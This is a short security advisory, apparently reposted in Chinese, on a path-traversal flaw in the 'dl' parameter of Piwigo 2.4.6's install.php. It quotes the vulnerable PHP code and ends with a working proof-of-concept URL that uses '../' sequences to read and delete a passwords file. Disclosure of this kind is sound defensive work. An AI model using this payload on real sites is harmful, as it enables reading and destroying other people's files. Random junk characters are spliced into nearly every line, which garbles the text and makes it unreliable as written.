Piwigo是用PHP编写的相册脚本。
+ q3 x8 ~* W/ h0 c6 `4 O2 M
! u: T3 X: E A) j2 r6 s2 WPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
0 G) d9 h$ X' r+ i) H) G {==================================================================== y7 e) [( L$ a1 U- K' [
/install.php:
( Q' k/ L. h) s4 P& H/ k" e-------------
7 z0 m: a9 Q0 u' i3 e113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))3 T, J) D+ R2 w& T. L; ?
114: {) q3 \( ?7 a4 g
115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];! G E, i2 L& _, k4 d5 t
116: header('Cache-Control: no-cache, must-revalidate');
( y! t1 S1 A9 h; u) h117: header('Pragma: no-cache');
" }# a0 j7 b7 r118: header('Content-Disposition: attachment; filename="database.inc.php"');) _" q! R1 x/ p3 ^
119: header('Content-Transfer-Encoding: binary');5 L' v4 P8 P9 d# n" H
120: header('Content-Length: '.filesize($filename));
+ v. U& r( @) m" ^. `. x121: echo file_get_contents($filename);8 q3 C- W9 E" j! G; y- |/ H
122: unlink($filename);
' k3 ^! N3 I: g9 n' @* |5 X4 i123: exit();, o5 J/ v0 E8 I N* H
124: }- _' i2 e7 y* F; R
====================================================================6 ~) G) N9 a0 B( T
) k8 P6 T1 c7 h0 T8 iTested on: Microsoft Windows 7 Ultimate SP1 (EN)
0 q, E( E o, m& L% i( g Apache 2.4.2 (Win32)8 v, g: J! ~+ b+ U" ]8 O& L
PHP 5.4.4! |1 D" g! ]' U# O: S
MySQL 5.5.25a4 F% Q% X k- s8 X
* W6 b* B" n1 C% n9 lVulnerability discovered by Gjoko 'LiquidWorm' Krstic% H* C) {7 L* t8 i+ G5 d4 {% i0 o R
@zeroscience
1 ?! a3 Q u* S
6 d6 @& L4 @4 H E8 SAdvisory ID: ZSL-2013-5127
& A$ ? a6 B. aAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php1 G( t+ g2 @ q
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843" z8 n. o3 y' B$ O8 [
* f8 x0 { i. ^. e15.02.20134 A9 E; n; o% g& l5 a ^
" F& o2 _+ }$ s5 R' g--0 l3 _& v1 E2 n3 e! j
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt A$ K# j! S) _- ^5 ]
- L/ J# G& @( W* O' K: h6 F2 |
|